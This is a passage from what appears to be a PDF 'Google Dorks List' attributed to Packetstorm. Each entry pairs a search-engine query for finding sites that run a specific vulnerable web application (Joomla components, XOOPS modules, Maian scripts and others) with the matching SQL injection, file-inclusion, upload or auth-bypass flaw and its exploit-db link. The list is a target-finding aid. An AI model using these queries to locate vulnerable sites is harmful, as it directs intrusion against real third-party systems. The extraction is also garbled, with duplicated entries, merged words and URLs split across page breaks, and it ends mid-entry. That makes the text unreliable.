Joomla Component netinvoice 1.2.0SP1 SQL Injection Vulnerability -CVE: 2008-3498: http://www.exploit-db.com/exploits/5939

inurl:com_beamospetition inurl:com_beamospetition

Joomla Component beamospetitionRemote SQL Injection Vulnerability -CVE: 2008-3132: http://www.exploit-db.com/exploits/5965

"com_lmo" "com_lmo"

Joomla LMO Component 1.0b2Remote Include Vulnerability - CVE:2006-3970: http://www.exploit-db.com/exploits/2092

"Powered byClicknet CMS" "Powered by Clicknet CMS"

Clicknet CMS 2.1 (side) Arbitrary FileDisclosure Vulnlerability - CVE: 2009-2325: http://www.exploit-db.com/exploits/9037

Igloo (interestgroup glue) Igloo (interest group glue)

Igloo 0.1.9 (Wiki.php) Remote FileInclude Vulnerability - CVE: 2006-2819: http://www.exploit-db.com/exploits/1863

inurl:"com_acstartseite" inurl:"com_acstartseite"

Joomla Component com_acstartseiteSql Injection Vulnerability:http://www.exploit-db.com/exploits/11479

"Powered byPopulum" "Powered by Populum"

Populum 2.3 SQL injectionvulnerability: http://www.exploit-db.com/exploits/11126

"Powered by PWPVersion 1-5-1"ANDinurl:"/wiki/run.php"

"Powered by PWP Version 1-5-1"AND inurl:"/wiki/run.php"

PWP Wiki Processor 1-5-1 RemoteFile Upload Vulnerability:http://www.exploit-db.com/exploits/7740

intext:"Design byBB Media.Org" intext:"Design by BB Media.Org"

BBMedia Design's SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12711

inurl:"com_acprojects" inurl:"com_acprojects"

Joomla Component com_acprojects SqlInjection Vulnerability:http://www.exploit-db.com/exploits/11480

inurl:"com_acteammember" inurl:"com_acteammember"

Joomla Componentcom_acteammember SQL InjectionVulnerability: http://www.exploit-db.com/exploits/11483

Page 301: Packetstorm Google Dorks List

Powered by MaianWeblog v4.0 Powered by Maian Weblog v4.0

Maian Weblog 4.0 Insecure CookieHandling Vulnerability - CVE: 2008-3318: http://www.exploit-db.com/exploits/6064

Powered by:Maian Recipe v1.2 Powered by: Maian Recipe v1.2

Maian Recipe 1.2 Insecure CookieHandling Vulnerability - CVE: 2008-3322: http://www.exploit-db.com/exploits/6063

Powered by:Maian Search v1.1 Powered by: Maian Search v1.1

Maian Search 1.1 Insecure CookieHandling Vulnerability - CVE: 2008-3317: http://www.exploit-db.com/exploits/6066

Powered by:Maian Links v3.1 Powered by: Maian Links v3.1

Maian Links 3.1 Insecure CookieHandling Vulnerability - CVE: 2008-3319: http://www.exploit-db.com/exploits/6062

Powered by:Maian Uploaderv4.0

Powered by: Maian Uploader v4.0

Maian Uploader 4.0 Insecure CookieHandling Vulnerability - CVE: 2008-3321: http://www.exploit-db.com/exploits/6065

"Powered BySteamcast "0.9.75beta

"Powered By Steamcast "0.9.75beta

Steamcast 0.9.75b Remote Denial ofService: http://www.exploit-db.com/exploits/8429

Powered by MaianGuestbook v3.2 Powered by Maian Guestbook v3.2

Maian Guestbook 3.2 Insecure CookieHandling Vulnerability - CVE: 2008-3320: http://www.exploit-db.com/exploits/6061

inurl:acrotxt.phpwbb inurl:acrotxt.php wbb

WBB2-Addon: Acrotxt v1 (show)Remote SQL Injection Vulnerability -CVE: 2007-4581: http://www.exploit-db.com/exploits/4327

Designedby:InterTech Co Designed by:InterTech Co

InterTech Co 1.0 SQL Injection:http://www.exploit-db.com/exploits/11440

allinurl:cid"modules/classifieds/index.php?pa=Adsview"

allinurl:cid"modules/classifieds/index.php?pa=Adsview"

XOOPS Module classifieds (cid)Remote SQL Injection Vulnerability -CVE: 2008-0873: http://www.exploit-db.com/exploits/5158

News powered byashnews News powered by ashnews

ashNews 0.83 (pathtoashnews) RemoteFile Include Vulnerabilities - CVE:2003-1292: http://www.exploit-db.com/exploits/1864

Page 302: Packetstorm Google Dorks List

"Transloader bySomik.org" OR"Transloader by"OR "Transloder"

"Transloader by Somik.org" OR"Transloader by" OR "Transloder"

Transload Script Upload Vulnerability:http://www.exploit-db.com/exploits/11155

allinurl: "modulesMyAnnoncesindex php paview"

allinurl: "modules MyAnnoncesindex php pa view"

RunCMS Module MyAnnonces (cid)SQL Injection Vulnerability - CVE:2008-0878: http://www.exploit-db.com/exploits/5156

"News Managedby Ditto News" "News Managed by Ditto News"

Xtreme/Ditto News 1.0 (post.php)Remote File Include Vulnerability:http://www.exploit-db.com/exploits/1887

Powered byArticlesOne.comoR WebsitePowered byArticlesOne.com

Powered by ArticlesOne.com oRWebsite Powered byArticlesOne.com

ArticlesOne 07232006 (page) RemoteInclude Vulnerability:http://www.exploit-db.com/exploits/2063

Coded ByWebLOADER Coded By WebLOADER

Webloader v7 - v8 ( vid ) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/12647

"Powered byPhilboard"inurl:"philboard_forum.asp"

"Powered by Philboard"inurl:"philboard_forum.asp"

Philboard 1.14 (philboard_forum.asp)SQL Injection Vulnerability - CVE:2007-0920: http://www.exploit-db.com/exploits/3295

"powered byCubeCart"inurl:"index.php?_a="

"powered by CubeCart"inurl:"index.php?_a="

CubeCart (index.php) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/11495

inurl:"com_jjgallery inurl:"com_jjgallery

Joomla Component Carousel FlashImage Gallery RFI Vulnerability -CVE: 2007-6027: http://www.exploit-db.com/exploits/4626

intext:"jPORTAL2"inurl:"mailer.php"

intext:"jPORTAL 2"inurl:"mailer.php"

jPORTAL 2 mailer.php Remote SQLInjection Vulnerability - CVE: 2007-5974: http://www.exploit-db.com/exploits/4611

intext: "Sitedeveloped &mantained byWoodall CreativeGroup"

intext: "Site developed & mantainedby Woodall Creative Group"

Woodall Creative SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12576

inurl:CuteSoft_Cli inurl:CuteSoft_Client/CuteEditor Cute Editor ASP.NET Remote File

Page 303: Packetstorm Google Dorks List

ent/CuteEditor Disclosure Vulnerability - CVE: 2009-4665: http://www.exploit-db.com/exploits/8785

"Web GroupCommunicationCenter beta 0.5.6"OR "Web GroupCommunicationCenter beta 0.5.5"

"Web Group CommunicationCenter beta 0.5.6" OR "Web GroupCommunication Center beta 0.5.5"

WGCC 0.5.6b (quiz.php) Remote SQLInjection Vulnerability - CVE: 2006-5514: http://www.exploit-db.com/exploits/2604

inurl:"picture.php?cat=" "Powered byPhpWebGallery1.3.4"

inurl:"picture.php?cat=" "Poweredby PhpWebGallery 1.3.4"

PhpWebGallery 1.3.4 (cat) Blind SQLInjection Vulnerability:http://www.exploit-db.com/exploits/6436

inurl:tr.php?id= inurl:tr.php?id=

Downline Goldminenewdownlinebuilder (tr.php id) SQLInjection Vuln: http://www.exploit-db.com/exploits/6951

inurl:tr.php?id= inurl:tr.php?id=

Downline Goldmine paidversion(tr.php id) SQL Injection Vulnerability:http://www.exploit-db.com/exploits/6950

allintext:"BrowseBlogs byCategory"

allintext:"Browse Blogs byCategory"

Blog System 1.x (index.php news_id)Remote SQL Injection Vulnerability -CVE: 2007-3979: http://www.exploit-db.com/exploits/4206

inurl:option=com_mydyngallery inurl:option=com_mydyngallery

Joomla Component mydyngallery 1.4.2(directory) SQL Injection Vuln - CVE:2008-5957: http://www.exploit-db.com/exploits/7343

inurl:index.php?mod=sondages inurl:index.php?mod=sondages

KwsPHP 1.0 sondages Module RemoteSQL Injection Vulnerability - CVE:2007-4979: http://www.exploit-db.com/exploits/4422

inurl:"tr1.php?id="Forced Matrix inurl:"tr1.php?id=" Forced Matrix

YourFreeWorld Forced Matrix Script(id) SQL Injection Vulnerability:http://www.exploit-db.com/exploits/6939

allintext:"SuperCali Event Calendar"

allintext:"SuperCali EventCalendar"

SuperCali PHP Event Calendar 0.4.0SQL Injection Vulnerability - CVE:2007-3582: http://www.exploit-db.com/exploits/4141

inurl:"com_ckforms" inurl:"com_ckforms" Joomla Component (com_ckforms)

Local File Inclusion Vulnerability:

Page 304: Packetstorm Google Dorks List

http://www.exploit-db.com/exploits/15453

inurl:"com_prayercenter" inurl:"com_prayercenter"

Joomla Component prayercenter 1.4.9(id) SQL Injection Vulnerability -CVE: 2008-6429: http://www.exploit-db.com/exploits/5708/

"Powered byGlossword 1.8.11"OR "Powered byGlossword 1.8.6"

"Powered by Glossword 1.8.11" OR"Powered by Glossword 1.8.6"

Glossword 1.8.11 (index.php x) LocalFile Inclusion Vulnerability:http://www.exploit-db.com/exploits/9010

ADP Forum 2.0.3is powered byVzScripts

ADP Forum 2.0.3 is powered byVzScripts

Vz (Adp) Forum 2.0.3 RemotePassword Disclosure Vulnerablity -CVE: 2006-6891: http://www.exploit-db.com/exploits/3053

inurl:"com_ccnewsletter" inurl:"com_ccnewsletter"

Joomla Component com_ccnewsletterLFI Vulnerability - CVE: 2010-0467:http://www.exploit-db.com/exploits/11282

inurl:"add_soft.php" inurl:"add_soft.php"

Software Index 1.1 (cid) Remote SQLInjection Vulnerability:http://www.exploit-db.com/exploits/5378

pages.php?id="Multi VendorMall"

pages.php?id= "Multi Vendor Mall"

Multi Vendor Mall (itemdetail.php &shop.php) SQL Injection Vulnerability:http://www.exploit-db.com/exploits/12755

"Search AffiliatePrograms:" "Search Affiliate Programs:"

Affiliate Directory (cat_id) RemoteSQL Injection Vulnerbility:http://www.exploit-db.com/exploits/5363

intitle:"Dacio'sImage Gallery" intitle:"Dacio's Image Gallery"

Dacio's Image Gallery 1.6(DT/Bypass/SU) RemoteVulnerabilities: http://www.exploit-db.com/exploits/8653

"Website bySpokane WebCommunications"

"Website by Spokane WebCommunications"

ArticleLive (Interspire WebsitePublisher) SQL Injection Vulnerability:http://www.exploit-db.com/exploits/12526

"powered by:elkagroup" "powered by: elkagroup"

elkagroup SQL Injection Vulnerability- CVE: 2009-4569: http://www.exploit-db.com/exploits/10330

allinurl:/myspeach allinurl:/myspeach/ MySpeach 3.0.2 (my_ms[root])

Page 305: Packetstorm Google Dorks List

/ Remote File Include Vulnerability -CVE: 2006-4630: http://www.exploit-db.com/exploits/2301

Powered byRevsense Powered by Revsense

RevSense (Auth bypass) Remote SQLInjection Vulnerability - CVE: 2008-6309: http://www.exploit-db.com/exploits/7163

724CMS Powered,724CMS Version4.59. Enterprise

724CMS Powered, 724CMSVersion 4.59. Enterprise

724CMS Enterprise Version 4.59 SQLInjection Vulnerability - CVE: 2008-1858: http://www.exploit-db.com/exploits/12560

index.php?option=com_facileforms index.php?option=com_facileforms

Joomla Component com_facileforms1.4.4 RFI Vulnerability - CVE: 2008-2990: http://www.exploit-db.com/exploits/5915

Powered ByphUploader Powered By phUploader

phUploader Remote File UploadVulnerability - CVE: 2007-4527:http://www.exploit-db.com/exploits/10574

inurl:"myLDlinker.php" inurl:"myLDlinker.php"

WordPress Plugin myLDlinker SQLInjection Vulnerability - CVE: 2010-2924: http://www.exploit-db.com/exploits/14441

inurl:com_idoblog inurl:com_idoblog

Joomla Component iDoBlog b24Remote SQL Injection Vulnerability -CVE: 2008-2627: http://www.exploit-db.com/exploits/5730

/modules/xhresim/ /modules/xhresim/

XOOPS Module xhresim (index.phpno) Remote SQL Injection Vuln -CVE: 2008-5665: http://www.exploit-db.com/exploits/6748

"Powered byFubarForum v1.5" "Powered by FubarForum v1.5"

FubarForum 1.5 (index.php page)Local File Inclusion Vulnerability -CVE: 2008-2887: http://www.exploit-db.com/exploits/5872

/modules/amevents/print.php?id= /modules/amevents/print.php?id=

XOOPS Module Amevents (print.phpid) SQL Injection Vulnerability - CVE:2008-5768: http://www.exploit-db.com/exploits/7479

allinurl:com_gallery"func"

allinurl: com_gallery "func"

Mambo Component com_galleryRemote SQL Injection Vulnerability -CVE: 2008-0746: http://www.exploit-db.com/exploits/5084

Page 306: Packetstorm Google Dorks List

"pForum 1.29a"OR ""Powie'sPSCRIPT Forum1.26"

"pForum 1.29a" OR ""Powie'sPSCRIPT Forum 1.26"

Powies pForum 1.29a (editpoll.php)SQL Injection Vulnerability - CVE:2006-6038: http://www.exploit-db.com/exploits/2797

allinurl:"/modules/myTopics/"

allinurl: "/modules/myTopics/"

XOOPS Module myTopics (articleid)Remote SQL Injection Vulnerability -CVE: 2008-0847: http://www.exploit-db.com/exploits/5148

inurl:"com_ckforms" inurl:"com_ckforms"

Joomla Component com_ckformsMultiple Vulnerabilities - CVE: 2010-1344: http://www.exploit-db.com/exploits/11785

allinurl:"index.php?site=" "W-Agora"

allinurl:"index.php?site=" "W-Agora"

w-Agora 4.2.1 (cat) Remote SQLInjection Vulnerability - CVE: 2007-6647: http://www.exploit-db.com/exploits/4817

inurl:categoria.php?ID= comune inurl:categoria.php?ID= comune

Prometeo v1.0.65 SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14806

inurl:"index.php?m_id=" inurl:"index.php?m_id="

slogan design Script SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12849

Powered by MVC-Web CMSinurl:/index.asp?newsid=

Powered by MVC-Web CMSinurl:/index.asp?newsid=

MVC-Web CMS 1.0/1.2 (index.aspnewsid) SQL Injection Vulnerability:http://www.exploit-db.com/exploits/5912

allinurl:"showCat.php?cat_id"

allinurl: "showCat.php?cat_id"

D.E. Classifieds (cat_id) Remote SQLInjection Vulnerability:http://www.exploit-db.com/exploits/5291

"PhpLinkExchange v1.02" "PhpLinkExchange v1.02"

PhpLinkExchange v1.02 - XSS/UploadVulerability - CVE: 2008-3679:http://www.exploit-db.com/exploits/10495

"ClanSys v.1.1" "ClanSys v.1.1"

Clansys v.1.1 (index.php page) PHPCode Insertion Vulnerability - CVE:2006-2005: http://www.exploit-db.com/exploits/1710

inurl:inc_accountlistmanager.asp inurl:inc_accountlistmanager.asp

DMXReady Account List Manager 1.1Contents Change Vulnerability:http://www.exploit-db.com/exploits/7754

Page 307: Packetstorm Google Dorks List

inurl:com_jomestate inurl:com_jomestate

Joomla Hot Property com_jomestateRFI Vulnerability: http://www.exploit-db.com/exploits/13956

"MembersStatistics" +"TotalMembers"+"Guests Online"

"Members Statistics" +"TotalMembers" +"Guests Online"

AR Memberscript (usercp_menu.php)Remote File Include Vulnerability -CVE: 2006-6590: http://www.exploit-db.com/exploits/2931

"CopyrightInteractivefx.ie" "Copyright Interactivefx.ie"

Interactivefx.ie CMS SQL InjectionVulnerability: http://www.exploit-db.com/exploits/11873

"Powered byAtomic PhotoAlbum"inurl:"photo.php?apa_album_ID="

"Powered by Atomic Photo Album"inurl:"photo.php?apa_album_ID="

Atomic Photo Album 1.0.2 MultipleVulnerabilities: http://www.exploit-db.com/exploits/14801

inurl:tr.php?id=Hosting inurl:tr.php?id= Hosting

YourFreeWorld Classifieds Hosting(id) SQL Injection Vulnerability -CVE: 2008-4884: http://www.exploit-db.com/exploits/6948

allinur:com_extended_registration allinur:com_extended_registration

Mambo com_registration_detailed 4.1Remote File Include - CVE: 2006-5254: http://www.exploit-db.com/exploits/2379

"100% | 50% |25%" "Back togallery"inurl:"show.php?imageid="

"100% | 50% | 25%" "Back togallery" inurl:"show.php?imageid="

Easy Photo Gallery 2.1 Arbitrary AddAdmin / remove user Vulnerability -CVE: 2008-4167: http://www.exploit-db.com/exploits/6437

inurl:com_rapidrecipe "recipe_id" inurl:com_rapidrecipe "recipe_id"

Joomla Component rapidrecipe RemoteSQL injection Vulnerability - CVE:2008-2697: http://www.exploit-db.com/exploits/5759

"Powered bySoftbizScripts""OURSPONSORS"

"Powered by SoftbizScripts" "OURSPONSORS"

Softbiz Link Directory Script RemoteSQL Injection Vulnerability - CVE:2007-5996: http://www.exploit-db.com/exploits/4620

Powered byPowerPortal v1.3a Powered by PowerPortal v1.3a

PowerPortal 1.3a (index.php) RemoteFile Include Vulnerability - CVE:2006-5126: http://www.exploit-db.com/exploits/2454

Powered byDUdforum 3.0inurl:/forums.asp?i

Powered by DUdforum 3.0inurl:/forums.asp?iFor=

DUdForum 3.0 (forum.asp iFor)Remote SQL Injection Vulnerability:http://www.exploit-

Page 308: Packetstorm Google Dorks List

For= db.com/exploits/5894

"powered by kure" "powered by kure"

Kure 0.6.3 (index.php post,doc) LocalFile Inclusion Vulnerability - CVE:2008-4632: http://www.exploit-db.com/exploits/6767

"Liberum HelpDesk, Copyright(C) 2001 DougLuxem"

"Liberum Help Desk, Copyright (C)2001 Doug Luxem"

Liberum Help Desk 0.97.3 (SQL/DD)Remote Vulnerabilities - CVE: 2008-6057: http://www.exploit-db.com/exploits/7493

inurl:modules.php?name=Shopping_Cart

inurl:modules.php?name=Shopping_Cart

PHP-Nuke Module Emporium 2.3.0(id_catg) SQL Injection Vulnerability -CVE: 2007-1034: http://www.exploit-db.com/exploits/10615

allinurl: galid"index.php?p=gallerypic"

allinurl: galid"index.php?p=gallerypic"

Koobi Pro 6.25 gallery Remote SQLInjection Vulnerability:http://www.exploit-db.com/exploits/5413

intext:"powered byitaco group" intext:"powered by itaco group"

ITaco Group ITaco.biz (view_news)SQL Injection Vulnerability:http://www.exploit-db.com/exploits/11012

"Powered byyappa-ng 2.3.1"AND "Powered byyappa-ng 2.3.1"

"Powered by yappa-ng 2.3.1" AND"Powered by yappa-ng 2.3.1"

yappa-ng 2.3.1 (admin_modules)Remote File Include Vulnerability:http://www.exploit-db.com/exploits/2292

mediaHolder.php?id mediaHolder.php?id

WordPress Media Holder(mediaHolder.php id) SQL InjectionVuln: http://www.exploit-db.com/exploits/6842

"powered byseditio" OR"powered by ldu"

"powered by seditio" OR "poweredby ldu"

Seditio CMS v121 (pfs.php) RemoteFile Upload Vulnerability - CVE:2007-4057: http://www.exploit-db.com/exploits/4235

inurl:com_forum inurl:com_forum com_forum Mambo Component

Powered By AJAuction Powered By AJ Auction

AJ Auction v1 (id) Remote SQLInjection Vulnerability:http://www.exploit-db.com/exploits/5868

"Powered byContent Injectorv1.52"

"Powered by Content Injectorv1.52"

Content Injector 1.52 (index.php cat)Remote SQL Injection Vulnerability -CVE: 2007-6137: http://www.exploit-db.com/exploits/4645

Page 309: Packetstorm Google Dorks List

Events Calendar1.1 Events Calendar 1.1

Events Calendar 1.1 Remote FileInclusion Vulnerability - CVE: 2008-4673: http://www.exploit-db.com/exploits/6623

"Copyright (c)2004-2006 bySimple PHPGuestbook"

"Copyright (c) 2004-2006 bySimple PHP Guestbook"

Simple PHP Guestbook Remote AdminAccess: http://www.exploit-db.com/exploits/10666

inurl:inc_linksmanager.asp inurl:inc_linksmanager.asp

DMXReady Links Manager 1.1Remote Contents ChangeVulnerability: http://www.exploit-db.com/exploits/7772

inurl:/index.php?option=com_otzivi inurl:/index.php?option=com_otzivi

Joomla Component com_otzivi BlindSQL Injection Vulnerability:http://www.exploit-db.com/exploits/10966

"Powered byDigitalHive" "Powered by DigitalHive"

DigitalHive 2.0 RC2(base_include.php) Remote IncludeVulnerability - CVE: 2006-5493:http://www.exploit-db.com/exploits/2566

inurl:"com_casino_blackjack" inurl:"com_casino_blackjack"

Joomla Casino 0.3.1 Multiple SQLInjection - CVE: 2009-2239:http://www.exploit-db.com/exploits/8743

inurl:"/tagit2b/" inurl:"/tagit2b/"

TagIt! Tagboard 2.1.b b2 (index.php)Remote File Include Vulnerability -CVE: 2006-5093: http://www.exploit-db.com/exploits/2450

"powered byLionWiki " "powered by LionWiki "

LionWiki 3.X (index.php) ShellUpload Vulnerability:http://www.exploit-db.com/exploits/12075

allinurl:"index.php?area"galid

allinurl: "index.php?area"galid

Koobi Pro 6.25 showimages RemoteSQL Injection Vulnerability:http://www.exploit-db.com/exploits/5414

inurl:"tr1.php?id=" inurl:"tr1.php?id="

YourFreeWorld Scrolling Text Ads(id) SQL Injection Vulnerability -CVE: 2008-4885: http://www.exploit-db.com/exploits/6942

"Designed bySpaceacre" "Designed by Spaceacre" Spaceacre Multiple SQL Injection

Vulnerability: http://www.exploit-

Page 310: Packetstorm Google Dorks List

db.com/exploits/12551

Powered byShadowed Portal Powered by Shadowed Portal

Shadowed Portal 5.7d3 (POST)Remote File Inclusion Vulnerability:http://www.exploit-db.com/exploits/4769

"Powered by:PhotoPost PHP4.6.5"

"Powered by: PhotoPost PHP 4.6.5"

PhotoPost PHP 4.6.5 (ecard.php) SQLInjection Vulnerability - CVE: 2004-0239: http://www.exploit-db.com/exploits/14453

inurl:"com_otzivi" inurl:"com_otzivi"

Joomla Component com_otzivi LocalFile Inclusion Vulnerability:http://www.exploit-db.com/exploits/11494

inurl:"browse.php?folder=" Poweredby GeneShop 5

inurl:"browse.php?folder="Powered by GeneShop 5

GeneShop 5.1.1 SQL InjectionVunerability: http://www.exploit-db.com/exploits/12442

"Powered byPsNews" "Powered by PsNews"

PsNews 1.1 (show.php newspath)Local File Inclusion Vulnerability -CVE: 2007-3772: http://www.exploit-db.com/exploits/4174

inurl:inc_faqsmanager.asp inurl:inc_faqsmanager.asp

DMXReady Faqs Manager 1.1 RemoteContents Change Vulnerability:http://www.exploit-db.com/exploits/7770

"powered by sX-Shop" "powered by sX-Shop"

sX-Shop Multiple SQL InjectionVulnerabilities: http://www.exploit-db.com/exploits/14558

intext:'Powered byProArcadeScript 'inurl:'game.php?id='

intext:'Powered by ProArcadeScript' inurl:'game.php?id='

ProArcadeScript to Game (game) SQLInjection Vulnerability - CVE: 2010-1069: http://www.exploit-db.com/exploits/11080

inurl:tr.php?id=Downline inurl:tr.php?id= Downline

YourFreeWorld Downline Builder (id)Remote SQL Injection Vulnerability -CVE: 2008-4895: http://www.exploit-db.com/exploits/6935

inurl:tr.php?id=Autoresponder inurl:tr.php?id= Autoresponder

YourFreeWorld AutoresponderHosting (id) SQL InjectionVulnerability - CVE: 2008-4882:http://www.exploit-db.com/exploits/6938

inurl:"/index.php?m="

inurl:"/index.php?m=""PHPRecipeBook 2.39"

PHPRecipeBook 2.39 (course_id)Remote SQL Injection Vulnerability -

Page 311: Packetstorm Google Dorks List

"PHPRecipeBook2.39"

CVE: 2009-4883: http://www.exploit-db.com/exploits/8330

"powered bywebClassifieds" "powered by webClassifieds"

webClassifieds 2005 (Auth Bypass)SQL Injection Vulnerability - CVE:2008-5817: http://www.exploit-db.com/exploits/7602

inurl:/modules/Partenaires/clic.php?id=

inurl:/modules/Partenaires/clic.php?id=

Nuked-Klan Module Partenaires NK1.5 Blind Sql Injection:http://www.exploit-db.com/exploits/14556

"Powered bySoftbizScripts""ALL JOBS"

"Powered by SoftbizScripts" "ALLJOBS"

Softbiz Jobs & Recruitment RemoteSQL Injection Vulnerability - CVE:2007-5316: http://www.exploit-db.com/exploits/4504

inurl:com_jabode inurl:com_jabode

Joomla Component jabode (id) RemoteSQL Injection Vulnerability - CVE:2008-7169: http://www.exploit-db.com/exploits/5963

"powered byDBHcms" "powered by DBHcms"

DBHcms 1.1.4 Stored XSS:http://www.exploit-db.com/exploits/12499

inurl:"nabopoll/" inurl:"nabopoll/"

nabopoll 1.2 Remote UnprotectedAdmin Section Vulnerability - CVE:2007-0873: http://www.exploit-db.com/exploits/3305

inurl:test.phpPowered byTalkBack

inurl:test.php Powered by TalkBack

TalkBack 2.3.14 Multiple RemoteVulnerabilities - CVE: 2009-4854:http://www.exploit-db.com/exploits/9095

"Powered byOvidentia" "Powered by Ovidentia"

Ovidentia 6.6.5 (item) Remote SQLInjection Vulnerability - CVE: 2008-3918: http://www.exploit-db.com/exploits/6232

team5 studio allrights reservedsite:cn

team5 studio all rights reservedsite:cn

Team 1.x (DD/XSS) Multiple RemoteVulnerabilities - CVE: 2009-0760:http://www.exploit-db.com/exploits/7982

allintext:" If youwould like tocontact us, ouremail address is"traffic

allintext:" If you would like tocontact us, our email address is"traffic

Traffic Stats (referralUrl.php offset)Remote SQL Injection Vulnerbility -CVE: 2007-3840: http://www.exploit-db.com/exploits/4187

Page 312: Packetstorm Google Dorks List

"powered byphpGreetCards" "powered by phpGreetCards"

phpGreetCards XSS/Arbitrary FileUpload Vulnerability - CVE: 2008-6848: http://www.exploit-db.com/exploits/7561

powered by apt-webservice ;apt-webshop-systemv3.0

powered by apt-webservice ;apt-webshop-system v3.0

APT-WEBSHOP-SYSTEMmodules.php SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14528

inurl:/wp-content/plugins/wpSS/

inurl:/wp-content/plugins/wpSS/

Wordpress Plugin Spreadsheet 0.6 SQLInjection Vulnerability - CVE: 2008-1982: http://www.exploit-db.com/exploits/5486

"Powerd bywww.e-webtech.com"

"Powerd by www.e-webtech.com"

e-webtech (new.asp?id=) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/12547

inurl:inc_billboardmanager.asp?ItemID=

inurl:inc_billboardmanager.asp?ItemID=

DMXReady Billboard Manager 1.1Remote File Upload Vulnerability:http://www.exploit-db.com/exploits/7791

allinurl:"modules/recipe" allinurl :"modules/recipe"

XOOPS Module Recipe (detail.php id)SQL Injection Vulnerability:http://www.exploit-db.com/exploits/5473

"powered by phpadvanced transfermanager"

"powered by php advanced transfermanager"

phpAtm 1.30 (downloadfile) RemoteFile Disclosure Vulnerability - CVE:2007-2659: http://www.exploit-db.com/exploits/3918

"Powered byGeN4" "Powered by GeN4"

PTCPay GEN4 (buyupg.php) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/14086

"Powered ByGravity Board Xv2.0 BETA"

"Powered By Gravity Board X v2.0BETA"

Gravity Board X 2.0b SQL Injection /Post Auth Code Execution - CVE:2008-2996: http://www.exploit-db.com/exploits/8350

inurl:com_flippingbook inurl:com_flippingbook

Joomla Component FlippingBook 1.0.4SQL Injection Vulnerability - CVE:2008-2095: http://www.exploit-db.com/exploits/5484

"Help desksoftware by UnitedWeb Coders rev.

"Help desk software by United WebCoders rev. 3.0.640"

Trouble Ticket Software ttx.cgiRemote File Download:http://www.exploit-

Page 313: Packetstorm Google Dorks List

3.0.640" db.com/exploits/11823

"Powered byvlBook 1.21" "Powered by vlBook 1.21"

vlBook 1.21 (XSS/LFI) MultipleRemote Vulnerabilities - CVE: 2008-2073: http://www.exploit-db.com/exploits/5529

inurl:tr.php?id=Reminder Service inurl:tr.php?id= Reminder Service

YourFreeWorld Reminder Service (id)SQL Injection Vulnerability - CVE:2008-4881: http://www.exploit-db.com/exploits/6943

"JevonwebGuestbook" "Jevonweb Guestbook"

Jevonweb Guestbook Remote AdminAccess: http://www.exploit-db.com/exploits/10665

inurl:inc_contactusmanager.asp inurl:inc_contactusmanager.asp

DMXReady Contact Us Manager 1.1Remote Contents Change Vuln:http://www.exploit-db.com/exploits/7768

inurl:com_neorecruit inurl:com_neorecruit

Joomla Component com_neorecruit 1.4SQL Injection Vulnerability:http://www.exploit-db.com/exploits/14570

"index.php?option=com_mdigg" "index.php?option=com_mdigg"

Joomla Component com_mdigg SQLInjection Vulnerability:http://www.exploit-db.com/exploits/10847

"Uploader byCeleronDude." "Uploader by CeleronDude."

Uploader by CeleronDude 5.3.0 -Upload Vulnerability:http://www.exploit-db.com/exploits/11166

"Software PBLang4.66z" AND"Software PBLang4.60" OR"SoftwarePBLang"

"Software PBLang 4.66z" AND"Software PBLang 4.60" OR"Software PBLang"

PBLang 4.66z (temppath) Remote FileInclude Vulnerability - CVE: 2006-5062: http://www.exploit-db.com/exploits/2428

'SEO byNuSEO.PHP' 'SEO by NuSEO.PHP'

NuSEO PHP Enterprise 1.6 RemoteFile Inclusion Vulnerability - CVE:2007-5409: http://www.exploit-db.com/exploits/4512

intext:"Webdesign bygoffgrafix.com"

intext:"Web design bygoffgrafix.com"

goffgrafix Design's SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12712

powered by powered by zeeways Zeeways Technology

Page 314: Packetstorm Google Dorks List

zeeways (product_desc.php) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/11047

"Welcome toExponent CMS" |"my new exponentsite"inurl:articlemodule

"Welcome to Exponent CMS" | "mynew exponent site"inurl:articlemodule

Exponent CMS 0.96.3 (articlemodule)Sql Injection Vulnerability:http://www.exploit-db.com/exploits/11349

intitle:"Shorty(Beta)" intitle:"Shorty (Beta)"

Shorty 0.7.1b (Auth Bypass) InsecureCookie Handling Vulnerability:http://www.exploit-db.com/exploits/9419

inurl:index.php?mod=ConcoursPhoto

inurl:index.php?mod=ConcoursPhoto

KwsPHP Module ConcoursPhoto(C_ID) SQL Injection Vulnerability -CVE: 2008-1758: http://www.exploit-db.com/exploits/5353

Powered bysabros.us Powered by sabros.us

sabros.us 1.75 (thumbnails.php)Remote File Disclosure Vulnerability -CVE: 2008-1799: http://www.exploit-db.com/exploits/5360

inurl:inc_registrationmanager.asp inurl:inc_registrationmanager.asp

DMXReady Registration Manager 1.1Contents Change Vulnerability:http://www.exploit-db.com/exploits/7784

"Powered byDrumbeat"inurl:index02.php

"Powered by Drumbeat"inurl:index02.php

Drumbeat CMS SQL Injection:http://www.exploit-db.com/exploits/10575

"Designed &Developed byN.E.T E-Commerce Group.All RightsReserved."

"Designed & Developed by N.E.TE-Commerce Group. All RightsReserved."

IranMC Arad Center (news.php id)SQL Injection Vulnerability:http://www.exploit-db.com/exploits/6712

"You have notprovided a surveyidentificationnumber"

"You have not provided a surveyidentification number"

LimeSurvey 1.52 (language.php)Remote File Inclusion Vulnerability -CVE: 2007-5573: http://www.exploit-db.com/exploits/4544

"Powered byComicShout" "Powered by ComicShout"

ComicShout 2.8 (news.php news_id)SQL Injection Vulnerability - CVE:2008-6425: http://www.exploit-db.com/exploits/5713

powered byPixaria. Gallery powered by Pixaria. Gallery Pixaria Gallery 1.x (class.Smarty.php)

Remote File Include Vulnerability -

Page 315: Packetstorm Google Dorks List

CVE: 2007-2457: http://www.exploit-db.com/exploits/3733

"Powered byFlashGameScript" "Powered by FlashGameScript"

FlashGameScript 1.7 (user) RemoteSQL Injection Vulnerability - CVE:2007-3646: http://www.exploit-db.com/exploits/4161

index.php?option=com_ongallery index.php?option=com_ongallery

Joomla Component OnGallery SQLInjection Vulnerability:http://www.exploit-db.com/exploits/14659

Powered byWHMCompleteSolution - ORinurl:WHMCS ORannouncements.php

Powered byWHMCompleteSolution - ORinurl:WHMCS ORannouncements.php

